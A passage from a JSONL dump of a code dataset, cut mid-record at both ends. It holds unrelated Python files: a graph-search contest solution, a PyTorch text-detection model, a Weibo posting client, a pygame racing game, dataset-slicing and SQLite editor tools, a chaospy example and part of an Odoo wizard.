t\n\ndef dijsktra(adjacent, s, t):\n if s == t:\n return [0,0]\n prior_q = [(0, 0, s)]\n heapq.heapify(prior_q)\n dist = dict()\n for city in adjacent:\n dist[city] = [float('inf'), 0]\n dist[s] = (0, 0)\n while prior_q:\n d, ar, u = heapq.heappop(prior_q)\n if u not in adjacent:\n return \n if d < dist[u][0]:\n dist[u] = [d, ar]\n for (dep_v, dur_v, v) in adjacent[u]:\n if 0 <= dep_v < 12 and dep_v + dur_v <= 12:\n if dist[v][0] == float('inf'):\n if u == s:\n time = dur_v\n else:\n if dist[u][1] <= dep_v:\n time = dist[u][0] + (dep_v - dist[u][1]) + dur_v\n else:\n time = dist[u][0] + (dep_v + 24 - dist[u][1]) + dur_v\n arrive_v = dep_v + dur_v\n heapq.heappush(prior_q, (time, arrive_v, v))\n if t in adjacent:\n return dist[t]\n else:\n return\n\nif __name__ == \"__main__\":\n test = int(input())\n for case in range(test):\n adjacent, s, t = read_input()\n res = dijsktra(adjacent, s, t)\n print('Test Case', str(case+1) + '.')\n if res is None or res[0] == float('inf'):\n print('There is no route Vladimir can take.')\n else:\n if res[1] >= res[0]%24:\n print('Vladimir needs', res[0]//24, 'litre(s) of blood.')\n else:\n print('Vladimir needs', res[0]//24 + 1, 'litre(s) of blood.')\n ","sub_path":"Online Judge/10187 - From Dusk Till Dawn.py","file_name":"10187 - From Dusk Till Dawn.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"61745318","text":"import torch.nn as nn\nimport torch\nimport torch.nn.functional as F\ntry:\n from vgg import *\n from resnet import *\n from senet import *\nexcept:\n from .vgg import *\n from .resnet import *\n from .senet import *\n\n\nclass Upsample(nn.Module):\n\n def __init__(self, in_channels, out_channels, multiply):\n super().__init__()\n self.conv5x5 = nn.Conv2d(\n in_channels, in_channels, kernel_size=5, stride=1, padding=2, bias=False)\n self.conv1x1_1 = nn.Conv2d(\n in_channels, in_channels, kernel_size=1, stride=1, padding=0, bias=False)\n self.conv1x1_2 = nn.Conv2d(\n in_channels, out_channels, kernel_size=1, stride=1, padding=0, bias=False)\n self.relu = nn.ReLU(inplace=True)\n self.multiply = multiply\n if multiply > 1:\n ratio = multiply/2\n self.deconv = nn.ConvTranspose2d(\n out_channels, out_channels, kernel_size=int(4*ratio), stride=int(2*ratio), padding=int(1*ratio))\n\n def forward(self, x):\n x = self.conv5x5(x)\n x = self.relu(x)\n x = self.conv1x1_1(x)\n x = self.relu(x)\n x = self.conv1x1_2(x)\n x = self.relu(x)\n if self.multiply > 1:\n x = self.deconv(x)\n return x\n\n\nresnet = {'resnet34': resnet34, 'resnet50': resnet50,\n 'resnet101': resnet101, 'resnet152': resnet152}\nvgg = {'vgg16': vgg16}\n\nse_net = {'se_resnext50_32x4d': se_resnext50_32x4d}\n\n\nclass TextFieldNet(nn.Module):\n\n def __init__(self, backbone='vgg16', output_channel=2):\n super().__init__()\n\n self.backbone_name = backbone\n self.output_channel = output_channel\n\n if backbone[0:3] == 'vgg':\n self.backbone = vgg[backbone]()\n self._make_upsample(expansion=1)\n elif backbone[0:6] == 'resnet':\n self.backbone = resnet[backbone]()\n expansion = 1 if backbone in ['resnet18', 'resnet34'] else 4\n self._make_upsample(expansion=expansion)\n elif backbone == 'se_resnext50_32x4d':\n self.backbone = se_net[backbone]()\n self._make_upsample(expansion=4)\n\n def _make_upsample(self, expansion=1):\n if self.backbone_name == 'vgg16':\n self.up5x4 = Upsample(512, 256, 4)\n self.up4x2 = Upsample(512, 256, 2)\n self.up3x1 = Upsample(256, 256, 1)\n self.up2x2 = nn.Sequential(\n nn.Conv2d(256*3, 512, kernel_size=1,\n stride=1, padding=0, bias=False),\n nn.ReLU(inplace=True),\n nn.Conv2d(512, 512, kernel_size=1,\n stride=1, padding=0, bias=False),\n nn.ReLU(inplace=True),\n nn.Conv2d(512, 2, kernel_size=1,\n stride=1, padding=0, bias=False)\n )\n self.up1x4 = nn.ConvTranspose2d(\n 2, 2, kernel_size=8, stride=4, padding=2, bias=False)\n else:\n pass\n\n def forward(self, x):\n # print('xxxxxxxxxxxx size',x.size())\n C1, C2, C3, C4, C5 = self.backbone(x)\n # print('c1', C1.size(), 'c2', C2.size(), 'c3',\n # C3.size(), 'c4', C4.size(), 'c5', C5.size())\n up5 = self.up5x4(C5)\n # print('up5',up5.size())\n up4 = self.up4x2(C4)\n # print('up4',up4.size())\n up3 = self.up3x1(C3)\n\n concat = torch.cat([up5, up4, up3], dim=1)\n # concat = self.concatx2(concat)\n # print('concat',concat.size())\n up2 = self.up2x2(concat)\n # print('up2',up2.size())\n up1 = self.up1x4(up2)\n # print(up1.size())\n return up1\n\n\nif __name__ == '__main__':\n import torch\n # input = torch.randn((1, 3, 768, 768))\n net = TextFieldNet(backbone='vgg16')\n # print(net(input).size())\n import torchsummary\n with torch.no_grad():\n print(torchsummary.summary(net, (3, 64, 64), batch_size=1, device='cpu'))\n exit()\n","sub_path":"torchtext/models/text_field_net.py","file_name":"text_field_net.py","file_ext":"py","file_size_in_byte":3948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"567147461","text":"from xcp2k.inputsection import InputSection\nfrom _localize4 import _localize4\nfrom _current3 import _current3\nfrom _nmr1 import _nmr1\nfrom _spinspin1 import _spinspin1\nfrom _epr1 import _epr1\nfrom _polar1 import _polar1\nfrom _print64 import _print64\n\n\nclass _linres1(InputSection):\n def __init__(self):\n InputSection.__init__(self)\n self.Eps = None\n self.Max_iter = None\n self.Restart_every = None\n self.Preconditioner = None\n self.Energy_gap = None\n self.Restart = None\n self.Wfn_restart_file_name = None\n self.LOCALIZE = _localize4()\n self.CURRENT = _current3()\n self.NMR = _nmr1()\n self.SPINSPIN = _spinspin1()\n self.EPR = _epr1()\n self.POLAR = _polar1()\n self.PRINT = _print64()\n self._name = \"LINRES\"\n self._keywords = {'Wfn_restart_file_name': 'WFN_RESTART_FILE_NAME', 'Max_iter': 'MAX_ITER', 'Eps': 'EPS', 'Preconditioner': 'PRECONDITIONER', 'Energy_gap': 'ENERGY_GAP', 'Restart_every': 'RESTART_EVERY', 'Restart': 'RESTART'}\n self._subsections = {'POLAR': 'POLAR', 'NMR': 'NMR', 'EPR': 'EPR', 'CURRENT': 'CURRENT', 'PRINT': 'PRINT', 'SPINSPIN': 'SPINSPIN', 'LOCALIZE': 'LOCALIZE'}\n self._aliases = {'Restart_file_name': 'Wfn_restart_file_name'}\n\n\n @property\n def Restart_file_name(self):\n \"\"\"\n See documentation for Wfn_restart_file_name\n \"\"\"\n return self.Wfn_restart_file_name\n\n @Restart_file_name.setter\n def Restart_file_name(self, value):\n self.Wfn_restart_file_name = value\n","sub_path":"xcp2k/classes/_linres1.py","file_name":"_linres1.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"182584628","text":"from dataset_costants import TABLE_DICT\n\nPATH_TO_LABELS = '/content/TableTrainNet/data/object-detection.pbtxt'\nBMP_IMAGE_TEST_TO_PATH = '/content/TableTrainNet/test'\n\nNUM_CLASSES = 1\n\nPATHS_TO_TEST_IMAGE = [\n 'test/test1.png',\n 'test/test2.png',\n 'test/test3.png',\n 'test/test4.png',\n 'test/test5.png',\n 'test/test6.png',\n 'test/test7.png'\n]\n\nPATHS_TO_CKPTS = [\n '/content/ckpt/model.ckpt'\n]\n\nTEST_SCORES = [0.2, 0.4, 0.6, 0.8]\n\nMAX_NUM_BOXES = 10\n","sub_path":"inference_costants.py","file_name":"inference_costants.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"199291584","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport requests\nimport base64\nimport binascii\nimport rsa\nimport re\nimport json\nimport time\nimport os\nimport random\nfrom ConfigUtils import Config\n\nclass Weibo(object):\n WBCLIENT = 'ssologin.js(v1.4.18)'\n user_agent = (\n\t 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) '\n 'Chrome/20.0.1132.57 Safari/536.11'\n )\n def __init__(self,config):\n self.config = config\n self.session = requests.session()\n self.session.headers = {\n \"User-Agent\":Weibo.user_agent\n }\n self.login()\n def encrypt_passwd(self,passwd, pubkey, servertime, nonce):\n key = rsa.PublicKey(int(pubkey, 16), int('10001', 16))\n message = str(servertime) + '\\t' + str(nonce) + '\\n' + str(passwd)\n passwd = rsa.encrypt(message.encode('utf-8'), key)\n return binascii.b2a_hex(passwd)\n\n def login(self):\n login = self.config.Login\n password = self.config.Password\n self.userName = self.config.UserName\n\n resp = self.session.get(\n 'http://login.sina.com.cn/sso/prelogin.php?'\n 'entry=weibo&callback=sinaSSOController.preloginCallBack&'\n 'su=%s&rsakt=mod&checkpin=1&client=%s' %\n (base64.b64encode(login.encode('utf-8')), Weibo.WBCLIENT)\n )\n\n pre_login_str = re.match(r'[^{]+({.+?})', resp.text).group(1)\n pre_login = json.loads(pre_login_str)\n data = {\n 'entry': 'weibo',\n 'gateway': 1,\n 'from': '',\n 'savestate': 7,\n 'userticket': 1,\n 'ssosimplelogin': 1,\n 'su': base64.b64encode(requests.utils.quote(login).encode('utf-8')),\n 'service': 'miniblog',\n 'servertime': pre_login['servertime'],\n 'nonce': pre_login['nonce'],\n 'vsnf': 1,\n 'vsnval': '',\n 'pwencode': 'rsa2',\n 'sp': self.encrypt_passwd(password, pre_login['pubkey'],\n pre_login['servertime'], pre_login['nonce']),\n 'rsakv' : pre_login['rsakv'],\n 'encoding': 'UTF-8',\n 'prelt': '53',\n 'url': 'http://weibo.com/ajaxlogin.php?framelogin=1&callback=parent.si'\n 'naSSOController.feedBackUrlCallBack',\n 'returntype': 'META'\n }\n resp = self.session.post(\n 'http://login.sina.com.cn/sso/login.php?client=%s' % Weibo.WBCLIENT,\n data=data\n )\n \n login_url = re.search('replace\\\\(\\'([^\\']+)\\'\\\\)', resp.text).group(1) \n\n resp = self.session.get(login_url)\n login_str = login_str = re.search('\\((\\{.*\\})\\)', resp.text).group(1)\n\n login_info = json.loads(login_str)\n uniqueid = login_info[\"userinfo\"][\"uniqueid\"]\n self.uid = uniqueid.encode(\"ascii\")\n print(\"登录成功 uid:\"+self.uid)\n \n def postData(self,data):\n currTime = \"%d\" % (time.time()*1000)\n self.session.headers[\"Host\"]=\"weibo.com\"\n self.session.headers[\"Origin\"]=\"http://weibo.com\"\n Referer = \"http://www.weibo.com/u/%s/home?wvr=5\" % self.uid\n self.session.headers[\"Referer\"] = Referer\n resp = self.session.post(\n 'http://weibo.com/aj/mblog/add?ajwvr=6&__rnd=%s'%currTime,data = data\n )\n\n def postMessage(self,message):\n data = {\n 'location':'v6_content_home',\n 'text':message,\n 'appkey':'',\n 'style_type':1,\n 'pic_id':'',\n 'pdetail':'',\n 'rank':0,\n 'rankid':'',\n 'module':'stissue',\n 'pub_source':'main_',\n 'pub_type':'dialog',\n '_t':0\n }\n self.postData(data)\n print(message +\" 发送成功\")\n \n def postImage(self,message,filePath):\n file = open(filePath, 'r')\n payload = file.read()\n file.close()\n url = 'weibo.com/u/'+self.uid\n atName = \"@\"+self.userName\n \n self.session.headers[\"Referer\"] = \"http://js.t.sinajs.cn/t6/home/static/swf/MultiFilesUpload.swf?version=446d5fa804a6fbf9\"\n self.session.headers[\"Host\"]=\"picupload.service.weibo.com\"\n self.session.headers[\"Origin\"]=\"http://js.t.sinajs.cn\"\n resp = self.session.post(\n 'http://picupload.service.weibo.com/interface/pic_upload.php?app=miniblog'+\n '&data=1&url='+url+'&markpos=1&logo=1&nick='+atName+'&marks=1&url='+url+\n '&mime=image/png&ct='+str(random.random()),\n data=payload\n )\n \n resultStr = re.search('{\"code.*', resp.text).group(0)\n resultJson = json.loads(resultStr)\n pic_id = resultJson[\"data\"][\"pics\"][\"pic_1\"][\"pid\"]\n data = {\n 'location':'v6_content_home',\n 'text':message,\n 'appkey':'',\n 'style_type':1,\n 'pic_id':pic_id,\n 'pdetail':'',\n 'rank':0,\n 'rankid':'',\n 'module':'stissue',\n 'pub_source':'main_',\n 'pub_type':'dialog',\n '_t':0\n }\n self.postData(data)\n print(message +\" 发送成功\")\n \nif __name__ == '__main__':\n weibo = Weibo(Config())\n weibo.postMessage('你好')\n weibo.postImage('分享图片2','/Downloads/3.png')\n print('Finish')\n \n ","sub_path":"Weibo.py","file_name":"Weibo.py","file_ext":"py","file_size_in_byte":5385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"146157975","text":"# -*- coding: utf-8 -*-\n#Auto = 100 Pixel breit\ntry:\n import thread\nexcept ImportError:\n import _thread as thread #Py3K changed it.\nimport pygame, time\nimport pygame.mixer\nfrom random import randint #Zufallszahlen\npygame.init()\npygame.mixer.pre_init(44100, -16, 2, 2048) #setup mixer to avoid sound lag\n\n#Farben in RGB\nblack = (0, 0, 0)\nwhite = (255, 255, 255)\nred = (255, 0, 0)\ngreen = (0, 255, 0)\nblue = (0, 0, 255)\n\n#-----------------#Window Options#-----------------\nwindow_size = (800, 600) #1920, 1080\nwindow = pygame.display.set_mode((window_size), pygame.RESIZABLE)\npygame.display.set_caption(\"Street Racer!\")\npygame.display.set_icon(pygame.image.load(\"./assets/images/icon.png\"))\n\n\npkt = 0\n#-----------------#Resources#-----------------\nbg_1 = pygame.image.load(\"./assets/images/road_1.png\").convert()\nbg_2 = pygame.image.load(\"./assets/images/road_2.png\").convert()\nbg_3 = pygame.image.load(\"./assets/images/road_3.png\").convert()\ncar = pygame.image.load(\"./assets/images/car.png\")\n#Money Bag!\nmoney_bag = pygame.image.load(\"./assets/images/money_bag.png\")\nmoney_bag_counter = 0\nmoney_bag_leader = 0\nrandom_money_pointer = 0\nmoney_bag_score = 20\nmoney_collect = [1,2]\ncar_pointer = ([220, 430], [350, 430], [500, 430]) #x, y\ncrash_car_x = [220, 350, 500]\nbg_animation = (bg_1, bg_2, bg_3)\nbg_counter = 0\nmoney_bag_pointer = (245, 375, 525) #(220, 350, 500)\n#Wo das auto stehen wird --> siehe car_pointer\nplayer_pos = 0\n#Gegner\nenm1 = pygame.image.load(\"./assets/images/enemie_1.png\")\nenm2 = pygame.image.load(\"./assets/images/enemie_2.png\")\nenm3 = pygame.image.load(\"./assets/images/enemie_3.png\")\nran_enm = (enm1, enm2, enm3)\nenm_counter = 0\ny_enm_leader = 0 #Geschwindigeit wie schnell gegner\nglobal speedo\nspeedo = 1\nenm_x_pointer = (220, 350, 500)\nenm_crash = [1, 2]\n\nmusic_on = False\nsound1 = pygame.mixer.Sound(\"./assets/sounds/sound1.ogg\")\nsound2 = pygame.mixer.Sound(\"./assets/sounds/sound2.ogg\")\nsound3 = pygame.mixer.Sound(\"./assets/sounds/sound3.ogg\")\nsound4 = pygame.mixer.Sound(\"./assets/sounds/sound4.ogg\")\nchime = pygame.mixer.Sound(\"./assets/sounds/chime.wav\")\nsound1.set_volume(0.2)\nsound2.set_volume(0.2)\nchime.set_volume(0.2)\nsound3.set_volume(0.2)\nsound4.set_volume(0.2)\n\n#-----------------#Functions#-----------------\ndef Text_on_screen(msg, color, size, pos):\n font = pygame.font.SysFont(None, size)\n screen_text = font.render(msg, True, color)\n window.blit(screen_text, pos)\n\ndef Level_up():\n global speedo\n global Cur_Level\n global fps\n fps = 30\n Cur_Level = 1\n if pkt >= 0: # LvL 1\n speedo = 10\n if pkt >= 200: # LvL 2\n Cur_Level += 1\n speedo = 20\n if pkt >= 600: # LvL 3\n Cur_Level += 1\n speedo = 15\n if pkt >= 1400: # LvL 4\n Cur_Level += 1\n speedo = 20\n if pkt >= 2000: # LvL 5\n Cur_Level += 1\n speedo = 25\n if pkt >= 3000: # LvL 6\n Cur_Level += 1\n speedo = 15\n fps = 60\n if pkt >= 4000: # LvL 7\n Cur_Level += 1\n speedo = 20\n if pkt >= 5000: # LvL 8\n Cur_Level += 1\n speedo = 25\n #Blinkender Text! :D\n if pkt in range(3000,3050) or pkt in range(3100, 3150) or pkt in range(3200, 3250):\n Text_on_screen(\"Hurry Up!\", red, 35, [670, 150])\n chime.play()\n\n\"\"\"if abfrag erstellen falls M schon gedrückt wurde. Musik kann doppelt\nabespielt werden aber die alte spur leider nicht gestoppt werden\"\"\"\n#Gefixt!\ndef random_music():\n global music_pointer\n global playlist\n global music_on\n if music_on == False:\n playlist = (sound1, sound2, sound3, sound4)\n ran = randint(0,3)\n music_pointer = ran\n playlist[ran].play()\n music_on = True\n\n#-----------------#Main Loop#-----------------\nclose = False\nwindow.blit(bg_1, [0, 0])\npygame.display.flip()\n\nclock = pygame.time.Clock()\nfps = 30\nglobal Cur_Level\n\n\nwhile not close:\n for event in pygame.event.get():\n #print (event)\n if event.type == pygame.QUIT:\n pygame.quit()\n close = True\n if event.type == pygame.KEYDOWN:\n if event.key is pygame.K_ESCAPE:\n pygame.quit()\n close = True\n #Test von Animation BG\n elif event.key == pygame.K_1:\n window.blit(bg_1, [0, 0])\n elif event.key == pygame.K_2:\n window.blit(bg_2, [0, 0])\n elif event.key == pygame.K_3:\n window.blit(bg_3, [0, 0])\n #4 if zeilen nur fürs movement\n elif event.key == pygame.K_LEFT:\n player_pos -= 1\n elif event.key == pygame.K_RIGHT:\n player_pos += 1\n elif event.key == pygame.K_m:\n random_music()\n elif event.key == pygame.K_n:\n playlist[music_pointer].stop()\n music_on = False\n if player_pos > 2:\n player_pos = 2\n if player_pos <= 0:\n player_pos = 0\n bg_counter += 1\n if bg_counter == 3:\n bg_counter = 0\n window.blit(bg_animation[bg_counter], [0, 0])\n window.blit(car, car_pointer[player_pos])\n if enm_counter <= 1: # Gegner Spawnen ab hier\n rnd = randint(0, 2)\n random = int(rnd)\n enm_counter += 1\n if y_enm_leader <= 600:\n window.blit(ran_enm[random], [enm_x_pointer[random], y_enm_leader])\n elif y_enm_leader >= 600:\n #-150 damit gegner noch \"ausserhalb\" spawnen\n y_enm_leader = -150\n enm_counter -= 1\n y_enm_leader += speedo # Geschwindigkeit des gegners\n #--------------------Money Bag!-----------------------------\n if money_bag_counter == 0:\n money_chance = randint(1, 100)\n if money_bag_counter == 0 and money_chance in range(1,3):\n rnd_mon = randint(0, 2)\n random_money = int(rnd_mon)\n money_bag_counter = 1\n if money_bag_leader <= 600 and money_bag_counter >= 1:\n window.blit(money_bag, [money_bag_pointer[random_money],money_bag_leader])\n if money_bag_leader >= 600:\n #-150 damit money bag noch \"ausserhalb\" spawnt\n money_bag_leader = -150\n money_bag_counter = 0\n if money_bag_counter == 1:\n money_bag_leader += speedo\n #Pointer um crash zu erkennen\n enm_crash[0] = enm_x_pointer[random]\n enm_crash[1] = y_enm_leader\n try:\n money_collect[0] = money_bag_pointer[random_money]\n money_collect[1] = money_bag_leader\n except:\n pass\n if enm_crash[0] == crash_car_x[player_pos] and enm_crash[1] >= 320:\n window.blit(bg_1, [0, 0])\n Text_on_screen(\"GAME OVER\", red, 100, [200, 300])\n pygame.display.update()\n time.sleep(1)\n pkt = 0\n if money_collect[0] == crash_car_x[player_pos] + 25 and money_collect[1] >= 350:\n money_bag_str = str(money_bag_score)\n #Text_on_screen(money_bag_str + \" Pkt!\", red, 25, [670, 150])\n thread.start_new_thread(Text_on_screen, (money_bag_str + \" Pkt!\", red, 25, [670, 150]))\n money_bag_counter = 0\n money_bag_leader = -150\n pkt += money_bag_score\n pkt += 1\n pkt_anzeige = str(pkt)\n Level_up()\n Text_on_screen(\"Punkte: \" + pkt_anzeige, red, 25, [670, 100])\n Cur_Level_str = str(Cur_Level)\n Text_on_screen(\"Level: \" + Cur_Level_str, red, 25, [670, 80])\n pygame.display.update()\n clock.tick(fps)\n\npygame.quit()\nquit()\n","sub_path":"Street_Race/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":7379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"360119005","text":"#!/usr/bin/python3\nimport argparse\nimport json\nimport os\nfrom shutil import copyfile\n\n\ndef filter_by_label(label_info, selected_labels):\n filtered = {}\n for key in label_info.keys():\n label = label_info[key]['label']\n if label in selected_labels:\n filtered[key] = label_info[key]\n return filtered\n\n\ndef find_and_count_labels(label_path, p, selected_labels):\n print(label_path)\n print('Labels count for the [ {} ] dataset.'.format(p.upper()))\n label_count = {}\n label_instances = {}\n with open(label_path) as f:\n label_info = json.load(f)\n for key in label_info.keys():\n label = label_info[key]['label']\n if label in label_count:\n label_count[label] = label_count[label] + 1\n label_instances[label].append(key)\n else:\n label_count[label] = 1\n label_instances[label] = [key]\n\n if len(selected_labels) > 0:\n for label in selected_labels:\n print('{} \\t {}'.format(label, label_count[label]))\n else:\n for label in sorted(label_count.keys()):\n print('{} \\t {}'.format(label, label_count[label]))\n\n\ndef update_label_index(filtered_info, selected_labels):\n for key in filtered_info.keys():\n label = filtered_info[key]['label']\n index = selected_labels.index(label)\n filtered_info[key]['label_index'] = index\n\n\ndef find_and_slice_labels(source_data_path, source_label_path, target_data_path, target_label_path, p, selected_labels):\n print(source_label_path)\n print(target_label_path)\n if not os.path.exists(target_data_path):\n os.makedirs(target_data_path)\n\n with open(source_label_path) as input:\n label_info = json.load(input)\n filtered_info = filter_by_label(label_info, selected_labels)\n update_label_index(filtered_info, selected_labels)\n\n with open(target_label_path, 'w') as output:\n json.dump(filtered_info, output, indent=3)\n\n for key in filtered_info.keys():\n source_file = '{}/{}.json'.format(source_data_path, key)\n target_file = '{}/{}.json'.format(target_data_path, key)\n with open(source_file) as video_input_file:\n video_input = json.load(video_input_file)\n label = video_input['label']\n index = selected_labels.index(label)\n video_input['label_index'] = index\n with open(target_file, 'w') as video_output_file:\n json.dump(video_input, video_output_file, indent=3)\n\n\n # copyfile(source_file, target_file)\n\n\n\ndef process_count_labels(arg):\n part = ['train', 'val']\n for p in part:\n label_path = '{}/kinetics_{}_label.json'.format(arg.data_path, p)\n find_and_count_labels(label_path, p, arg.labels)\n\n\ndef process_slice_labels(arg):\n part = ['train', 'val']\n for p in part:\n source_label_path = '{}/kinetics_{}_label.json'.format(arg.data_path, p)\n source_data_path = '{}/kinetics_{}'.format(arg.data_path, p)\n target_label_path = '{}/kinetics_{}_label.json'.format(arg.output_path, p)\n target_data_path = '{}/kinetics_{}'.format(arg.output_path, p)\n find_and_slice_labels(source_data_path, source_label_path, target_data_path, target_label_path, p, arg.labels)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Skeleton data processing utility', epilog='Hope I`ve been helpfull! See`ya')\n parser.add_argument('operation', choices=['count_labels', 'slice_labels'])\n parser.add_argument('--data_path', nargs=1, help='Path to data to be processed', default='data/raw/kinetics-skeleton')\n parser.add_argument('--output_path', help='Path to write data after processing', default='data/raw/kinetics-skeleton/slice/temp')\n parser.add_argument('--labels', nargs='*', help='Labels to be processed', default='')\n args = parser.parse_args()\n if args.operation == 'count_labels':\n process_count_labels(args)\n elif args.operation == 'slice_labels':\n process_slice_labels(args)\n else:\n print('Im nothing')","sub_path":"processing/kinetics_data.py","file_name":"kinetics_data.py","file_ext":"py","file_size_in_byte":4156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"406850947","text":"import pygame, time, sys\nimport sqlite3\nfrom textbox import *\n\nclass Editor(object):\n def __init__(self):\n global field_name\n pygame.init()\n pygame.font.init()\n self.font = pygame.font.Font('data/GameFont.ttf', 16)\n\n pygame.display.set_caption(\"SQL Editor\")\n self.screen = pygame.display.set_mode((1024, 700), pygame.RESIZABLE)\n self.clock = pygame.time.Clock()\n\n self.conn = sqlite3.connect('data/saves/data.db')\n self.c = self.conn.cursor()\n\n self.array = []\n self.default_text = \"None\"\n self.current_row = \"None1\"\n\n self.field_name = []\n for name in self.c.execute(\"PRAGMA table_info(csv);\"):\n self.field_name.append(name)\n\n self.running = True\n self.draw_db()\n while self.running:\n event = pygame.event.wait ()\n if event.type == pygame.QUIT:\n self.running = False\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n self.running = False\n elif pygame.mouse.get_pressed()[0] == 1:\n self.default_text, self.mouse_handler(pygame.mouse.get_pos())\n self.input_box = self.edit_popup(self.default_text)\n self.c.close()\n\n def update_db(self, id, data, current_row, default_text):\n conn = sqlite3.connect('data/saves/data.db')\n c = conn.cursor()\n field_name = []\n for name in c.execute(\"PRAGMA table_info(csv);\"):\n field_name.append(name)\n\n for col_name in field_name:\n for row_index, row in enumerate(c.execute('SELECT * FROM csv'.format(col_name[1]))):\n if row == current_row:\n for item_index, item in enumerate(row):\n if default_text in item:\n c.execute(\"UPDATE csv SET {0}='{1}' WHERE {0}='{3}' AND {4}='{5}'\"\n .format(col_name[1], data, col_name[1], default_text,\n field_name[1][1], current_row[1]))\n conn.commit()\n \n def draw_db(self):\n for col_name in self.c.execute(\"PRAGMA table_info(csv);\"):\n for name_index, name in enumerate(self.field_name):\n text = self.font.render(name[1], True, pygame.Color('White')) \n self.screen.blit(text, (30+name_index*120, 30+0*20))\n pass\n for row_index, row in enumerate(self.c.execute('SELECT * FROM csv'.format(col_name[1]))):\n self.array.append(row)\n for item_index, item in enumerate(row):\n text = self.font.render(item, True, pygame.Color('White')) \n self.screen.blit(text, (30+item_index*120, 30+(row_index+1)*20))\n pass\n pygame.display.update()\n\n def edit_popup(self, default_text):\n x = (pygame.display.get_surface().get_size()[0]-200)/2\n y = (pygame.display.get_surface().get_size()[1]-40)/2\n \n self.app = Control(self.screen, (x, y, 200, 40), self.__class__, self.current_row, self.default_text)\n self.app.main_loop()\n self.screen.fill(pygame.Color('Black'))\n self.conn.commit()\n self.draw_db()\n\n def mouse_handler(self, mouse_pos):\n mouse_x, mouse_y = mouse_pos[0], mouse_pos[1]\n for y, row in enumerate(self.array):\n for x, item in enumerate(self.array[y]):\n if mouse_x > 30+(x*150) and mouse_x < 30+(x*150)+150:\n if mouse_y > 30+((y+1)*23) and mouse_y < 30+((y+1)*23)+23:\n self.default_text = self.array[y][x]\n self.current_row = self.array[y]\n \n\nclass Control(object):\n def __init__(self, screen, dimensions, parent, current_row, default_text):\n KEY_REPEAT_SETTING = (150,50)\n pygame.init()\n pygame.display.set_caption(\"Input Box\")\n self.screen = screen\n self.clock = pygame.time.Clock()\n self.fps = 60.0\n self.done = False\n self.dimensions = dimensions\n self.input = TextBox(dimensions,parent=parent,current_row=current_row,command=Editor.update_db,\n clear_on_enter=True,inactive_on_enter=False,\n buffer=list(default_text), default_text=default_text)\n self.color = (100,100,100)\n self.prompt = self.make_prompt()\n pygame.key.set_repeat(*KEY_REPEAT_SETTING)\n\n def make_prompt(self):\n font = pygame.font.SysFont(\"arial\", 20)\n rend = font.render(\"\", True, pygame.Color(\"white\")) \n return (rend, rend.get_rect(topleft=(0, 0)))\n\n def event_loop(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.done = True\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n self.done = True\n self.input.get_event(event)\n\n def main_loop(self):\n while not self.done:\n self.event_loop()\n self.input.update()\n self.input.draw(self.screen)\n self.screen.blit(*self.prompt)\n pygame.display.update()\n self.clock.tick(self.fps)\n","sub_path":"lib/db_interface.py","file_name":"db_interface.py","file_ext":"py","file_size_in_byte":5392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"371400467","text":"import chaospy as cp\nimport numpy as np\n\n# modele : u represente l'ecart de temperature T-Ti\ndef u(t, a, I) :\n\treturn I*np. exp(-a*t)\n\n# Definition des distributions statistiques\ndist_a = cp.Uniform(0., 0.001)\ndist_I = cp.Uniform(10, 16)\ndist = cp.J(dist_a, dist_I)\n\n#integration Monte Carlo avec plan de tirages Latin Hypercube \nsamples = dist.sample(1000, rule=\"L\")\nt = np.linspace(0, 1200, 10)\nsample_u = [u(t, *s) for s in samples.T]\n\nE = np.mean(sample_u,0)\nVar = np.var(sample_u,0)\nprint('MC avec plan de tirages Latin Hypercube :')\nprint('E : ',E)\nprint('Var : ',Var)\n","sub_path":"scripts/Application16_EquaDif_chaospy2.py","file_name":"Application16_EquaDif_chaospy2.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"402572939","text":"# -*- coding: utf-8 -*-\n# Created by Hoanglv on 9/5/2019\n\nfrom odoo import api, fields, models, _\nfrom odoo.exceptions import except_orm\n\nfrom addons_custom.izi_message_dialog.message_dialog_config import MessageDialogConfig\n\n\nclass SaleOrderMakePosOrder(models.TransientModel):\n _name = 'sale.order.make.pos.order'\n _inherit = ['message.dialog']\n\n pos_config_id = fields.Many2one('pos.config', string='Pos config')\n pos_session_id = fields.Many2one('pos.session', string='Pos session')\n\n @api.onchange('pos_config_id')\n def _onchange_pos_config_id(self):\n if self.pos_config_id:\n session = self.env['pos.session'].search([('config_id', '=', self.pos_config_id.id),\n ('state', '=', 'opened')], limit=1)\n self.pos_session_id = session.id if session else False\n\n @api.multi\n def create_pos_order(self):\n if not self.pos_session_id:\n raise except_orm(_('Warning'), _('Request to create a session before create pos order.'))\n pos = self.move_to_pos()\n return self.__get_pos_view(pos)\n\n def __get_pos_view(self, pos):\n view_id = self.env.ref('point_of_sale.view_pos_pos_form').id\n return {\n 'name': pos.name,\n 'type': 'ir.actions.act_window',\n 'res_model': 'pos.order',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'views': [(view_id, 'form')],\n 'target': 'current',\n 'res_id': pos.id,\n 'context': dict(self._context),\n }\n\n def 